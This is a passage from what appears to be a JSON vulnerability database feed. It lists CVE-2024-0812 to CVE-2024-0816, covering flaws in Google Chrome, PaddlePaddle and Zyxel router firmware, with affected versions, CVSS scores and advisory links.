{ "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-06-16T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0812", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1484394", "name" : "https://crbug.com/1484394", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1484394", "name" : "https://crbug.com/1484394", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-05-30T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0813", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1477151", "name" : "https://crbug.com/1477151", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1477151", "name" : "https://crbug.com/1477151", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Use after free in Reading Mode in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-06-20T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0814", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-346" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1463935", "name" : "https://crbug.com/1463935", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1463935", "name" : "https://crbug.com/1463935", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "121.0.6167.85", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-24T00:15Z", "lastModifiedDate" : "2025-05-30T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0815", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/83bf8191-b259-4b24-8ec9-0115d7c05350", "name" : "https://huntr.com/bounties/83bf8191-b259-4b24-8ec9-0115d7c05350", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/83bf8191-b259-4b24-8ec9-0115d7c05350", "name" : "https://huntr.com/bounties/83bf8191-b259-4b24-8ec9-0115d7c05350", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Command injection in paddle.utils.download._wget_download (bypass filter) in paddlepaddle/paddle 2.6.0" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:paddlepaddle:paddlepaddle:2.6.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.0, "impactScore" : 6.0 } }, "publishedDate" : "2024-03-07T04:15Z", "lastModifiedDate" : "2025-01-19T02:23Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0816", "ASSIGNER" : "security@zyxel.com.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-buffer-overflow-vulnerabilities-in-some-5g-nr-4g-lte-cpe-dsl-ethernet-cpe-fiber-ont-wifi-extender-and-home-router-devices-05-21-2024", "name" : "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-buffer-overflow-vulnerabilities-in-some-5g-nr-4g-lte-cpe-dsl-ethernet-cpe-fiber-ont-wifi-extender-and-home-router-devices-05-21-2024", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-buffer-overflow-vulnerabilities-in-some-5g-nr-4g-lte-cpe-dsl-ethernet-cpe-fiber-ont-wifi-extender-and-home-router-devices-05-21-2024", "name" : "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-buffer-overflow-vulnerabilities-in-some-5g-nr-4g-lte-cpe-dsl-ethernet-cpe-fiber-ont-wifi-extender-and-home-router-devices-05-21-2024", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The buffer overflow vulnerability in the DX3300-T1 firmware version V5.50(ABVY.4)C0 could allow an authenticated local attacker to cause denial of service (DoS) conditions by executing the CLI command with crafted strings on an affected device." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:lte3202-m437_firmware:1.00\\(abwf.3\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:lte3202-m437:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:lte3301-plus_firmware:1.00\\(abqu.5\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:lte3301-plus:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:lte5388-m804_firmware:1.00\\(absq.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:lte5388-m804:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:lte5398-m904_firmware:1.00\\(abq.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:lte5398-m904:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:lte7240-m403_firmware:2.00\\(abmg.7\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:lte7240-m403:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:lte7480-m804_firmware:1.00\\(abra.8\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:lte7480-m804:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:lte7490-m904_firmware:1.00\\(abqy.7\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:lte7490-m904:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr5103_firmware:4.19\\(abyc.5\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr5103:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr5103e_firmware:1.00\\(acdj.1\\)b3:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr5103e:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr5103ev2_firmware:1.00\\(aciq.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr5103ev2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr5307_firmware:1.00\\(acjt.0\\)b4:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr5307:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr7101_firmware:1.00\\(abu.9\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr7101:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr7102_firmware:1.00\\(abyd.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr7102:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr7103_firmware:1.00\\(accz.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr7103:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr7302_firmware:1.00\\(acha.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr7302:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr7303_firmware:1.00\\(acei.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr7303:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nr7501_firmware:1.00\\(aceh.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nr7501:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nebula_fwa505_firmware:1.18\\(acko.1\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nebula_fwa505:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nebula_fwa510_firmware:1.18\\(acgd.1\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nebula_fwa510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nebula_fwa710_firmware:1.17\\(acgc.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nebula_fwa710:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nebula_lte3301-plus_firmware:1.17\\(acca.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nebula_lte3301-plus:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nebula_lte7461-m602_firmware:1.15\\(ace.3\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nebula_lte7461-m602:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nebula_nr5101_firmware:1.16\\(accg.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nebula_nr5101:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nebula_nr7101_firmware:1.16\\(accc.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nebula_nr7101:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:dx3300-t1_firmware:5.50\\(aby.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { 